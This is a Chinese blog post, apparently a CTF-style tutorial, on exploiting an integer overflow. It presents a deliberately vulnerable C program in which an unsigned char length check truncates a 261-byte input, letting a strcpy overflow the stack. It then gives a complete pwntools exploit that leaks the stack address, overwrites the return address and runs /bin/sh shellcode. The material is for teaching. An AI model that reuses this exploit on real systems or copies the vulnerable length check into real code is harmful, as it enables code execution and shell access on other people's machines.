qlq1

什么是整型溢出

image.png

注意:大的范围转给小的范围的数,会造成截断,这是内存分布结构所导致的,下面示例中会讲到

首先checksec

image.png

未开保护

程序源码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void foo(char* passwd) {
    char passwd_buf[11];
    unsigned char passwd_len = strlen(passwd); //char来存储passwd_len
    if(passwd_len >= 4 && passwd_len <= 8) { 
        printf("Valid Password\n"); 
        fflush(stdout);
        strcpy(passwd_buf,passwd);
    } 
    else {
        printf("Invalid Password\n"); 
        fflush(stdout);
    }
}

int main() {
    char a[300];
    printf("0x%x\n",a);
    puts("input your passwd:");
    
    read(0,a,300);
    foo(a);
    return 0;
}

分析
第一个漏洞点:uchar 的len,因为长度为256,当大于256就会截断,如输入261(0001 0000 0101),截断后(后uchar字节的数):5(0101),所以len会变为5(这就是大的范围转给小的范围的数,会造成截断),因为整数溢出过大这里用uchar来做例子,原理是是一样的

第二个漏洞点:基本的栈溢出,就是复制密码到数组

编写exp过程

1.程序开始便打印了栈上变量的地址,相当于泄露栈地址
2.通过ida分析


image.png

buf距离ebp 20个字节,距离eip24字节
因此字节填充为'a'*24


image.png

3.动态调试确定shellcode地址偏移


image.png

4.将‘c'*8改为shellcode即可

exp

#exp.py 
from pwn import *

p=process("./vuln")

shell = asm(shellcraft.i386.linux.sh())


p.recvuntil("0x")
addr=int(p.recv(8),16)-0x14

p.recvuntil("passwd:\n")
payload='a'*24
payload+=p32(addr)
payload+=shell
payload=payload.ljust(261,'b')
payload+='\x00'

p.send(payload)
#gdb.attach(p,"b *0x804A060")
p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 缓冲区溢出(Buffer Overflow)是计算机安全领域内既经典而又古老的话题。随着计算机系统安全性的加强,传...
    Chivalrous阅读 5,111评论 0 5
  • Lua 5.1 参考手册 by Roberto Ierusalimschy, Luiz Henrique de F...
    苏黎九歌阅读 14,736评论 0 38
  • (一) 我发誓,对于我这样吹毛求疵一生追求完美的姑娘,在最开始遇到林书博这种纯种理工直男时,是一点儿兴趣都没有的。...
    长了一只喵的树阅读 4,381评论 5 3
  • 我一直觉得自己是一个想法非常多的人,有很多很多不切实际的想法。 更糟糕的是我只是随便想想,付诸行动的甚少。 回忆起...
    ecb46beeffb3阅读 3,184评论 0 1
  • 昨天在我老家发生了一起自杀事件。一个20岁左右的女孩因为高考落榜和母亲怄气跳江自杀了。等村民们发现的时候孩子已经断...
    微澜阁下阅读 2,812评论 4 3